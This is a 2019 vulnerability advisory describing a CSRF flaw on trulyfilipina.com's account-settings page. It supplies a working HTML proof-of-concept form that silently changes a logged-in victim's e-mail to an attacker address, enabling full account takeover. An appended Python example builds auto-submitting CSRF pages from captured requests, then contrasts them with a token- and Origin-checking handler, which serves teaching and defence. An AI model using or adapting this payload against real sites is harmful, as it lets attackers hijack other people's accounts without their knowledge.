#####################################################################
# Title : XSRF (CSRF) Vulnerability in trulyfilipina.com leads to full account takeover
# Founder : Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16
# Date : 04/06/2019
# Home : Annaba ( Algeria )
# Tested on : Linux ( Backbox )
######################################################################
# Happy Eid for everyone :D
## PoC ##
[ + ] Create an account, then log in to the website
[ + ] Go to https://v1.trulyfilipina.com/settings/manageaccount/ , intercept the POST request that the "manage account" form sends, and generate a CSRF PoC from it (the request carries no anti-CSRF token, so the session cookie alone is enough for the server to accept it)
[ + ] Edit the values (e.g. set the e-mail to an address you control), then send the generated page to the victim. When the logged-in victim opens it, the browser attaches the session cookie, the server accepts the forged request and the victim's account data is changed
without their knowledge
Because the e-mail address (and optionally the password) can be rewritten this way, an attacker who changes it to an address they control ends up with full access to the account and can take it over without the victim knowing.
----------------------------- Vulnerable Form ------------------------------------------------------
<!-- CSRF PoC: the intercepted form, replayed from an attacker-controlled page.
     Note that there is no anti-CSRF token field anywhere in the request; the
     only thing authorising the change is the victim's session cookie, which
     the browser sends automatically. -->
<form action="https://v1.trulyfilipina.com/settings/manageaccount/" class="form-horizontal" role="form" id="MemberManageaccountForm" method="post" accept-charset="utf-8">
    <input type="hidden" name="_method" value="POST"/>
    <!-- attacker-controlled address: once saved, the account is tied to it -->
    <input name="data[Member][email]" value="hackedbybassem@gmail.com" maxlength="255" type="hidden" id="MemberEmail" required="required"/>
    <!-- password fields sent empty, as in the captured request -->
    <input name="data[Member][password]" class="form-control" value="" type="hidden" id="MemberPassword"/>
    <input name="data[Member][repassword]" class="form-control" value="" type="hidden" id="MemberRepassword"/>
    <input type="submit" value="Submit request"/>
</form>
-------------------------------------------------------------
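The following is an added example, not code from the advisory or from the site: it models the "generate CSRF PoC" step above (turning the intercepted POST body into an auto-submitting page, as an intercepting proxy does) and then contrasts the behaviour described in the PoC with the server-side check the endpoint lacks. The URL and the data[Member][...] field names are those in the advisory; the Session class, the two handler functions and the csrf_token field name are hypothetical stand-ins for the real application.

```python
"""
Added example (not the advisory's or the site's code): build a CSRF PoC page from
a captured POST body, then show why a synchronizer token defeats it.
Hypothetical pieces: Session, manageaccount_vulnerable, manageaccount_hardened,
and the csrf_token field name.
"""
import hmac
import html
import secrets
from typing import Optional
from urllib.parse import parse_qsl

TARGET = "https://v1.trulyfilipina.com/settings/manageaccount/"
SITE_ORIGIN = "https://v1.trulyfilipina.com"

# Constructed sample: the intercepted request body with the e-mail value
# already replaced by an attacker-controlled address (step 3 of the PoC).
CAPTURED_BODY = (
    "_method=POST"
    "&data%5BMember%5D%5Bemail%5D=attacker%40example.com"
    "&data%5BMember%5D%5Bpassword%5D="
    "&data%5BMember%5D%5Brepassword%5D="
)


def build_csrf_poc(action: str, body: str) -> str:
    """Turn a captured application/x-www-form-urlencoded body into an
    auto-submitting HTML form. Names and values are HTML-escaped so the page
    stays well-formed whatever the captured content contains."""
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(n, quote=True)}"'
        f' value="{html.escape(v, quote=True)}"/>'
        for n, v in parse_qsl(body, keep_blank_values=True)
    )
    return (
        "<html><body>\n"
        f'  <form id="csrf" action="{html.escape(action, quote=True)}" method="post">\n'
        f"{inputs}\n"
        "  </form>\n"
        "  <script>document.getElementById('csrf').submit();</script>\n"
        "</body></html>\n"
    )


class Session:
    """Hypothetical server-side session; the cookie the victim's browser
    attaches to the forged request resolves to one of these."""

    def __init__(self, email: str) -> None:
        self.email = email
        # Per-session random token, rendered into the legitimate form only.
        self.csrf_token = secrets.token_urlsafe(32)


def manageaccount_vulnerable(session: Session, body: str) -> int:
    """Behaviour the advisory describes: the session cookie alone authorises
    the change, so any page that makes the victim's browser POST here wins."""
    form = dict(parse_qsl(body, keep_blank_values=True))
    session.email = form["data[Member][email]"]
    return 200


def manageaccount_hardened(session: Session, body: str, origin: Optional[str]) -> int:
    """Synchronizer-token check, plus an Origin check as defence in depth."""
    form = dict(parse_qsl(body, keep_blank_values=True))
    # The attacker's page cannot read the victim's token (same-origin policy),
    # so a forged body either lacks it or carries a wrong one. Compare in
    # constant time, on bytes so non-ASCII input cannot raise.
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, session.csrf_token.encode()):
        return 403
    # Browsers attach Origin to cross-site form POSTs; anything that did not
    # come from our own origin is rejected.
    if origin != SITE_ORIGIN:
        return 403
    session.email = form["data[Member][email]"]
    return 200


def run_demo() -> dict:
    """Replay the forged request against both handlers, then a same-origin
    submission of the same form that carries the session's token."""
    victim = Session("victim@example.com")  # constructed
    forged = CAPTURED_BODY  # cross-site: no token, attacker's Origin
    legit = CAPTURED_BODY + "&csrf_token=" + victim.csrf_token
    return {
        "vulnerable_forged": manageaccount_vulnerable(Session("victim@example.com"), forged),
        "hardened_forged": manageaccount_hardened(victim, forged, "https://attacker.example"),
        "hardened_legit": manageaccount_hardened(victim, legit, SITE_ORIGIN),
    }


if __name__ == "__main__":
    print(build_csrf_poc(TARGET, CAPTURED_BODY))
    print(run_demo())
```

The generated page differs from the form above only in that it submits itself on load, so the victim does not have to click anything. On the defensive side, marking the session cookie SameSite=Lax (or Strict) would also stop the browser from attaching it to a cross-site POST, which is a cheap second layer on top of the token check.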
Sh00tz To my pc :V
--------------------------------------------------------------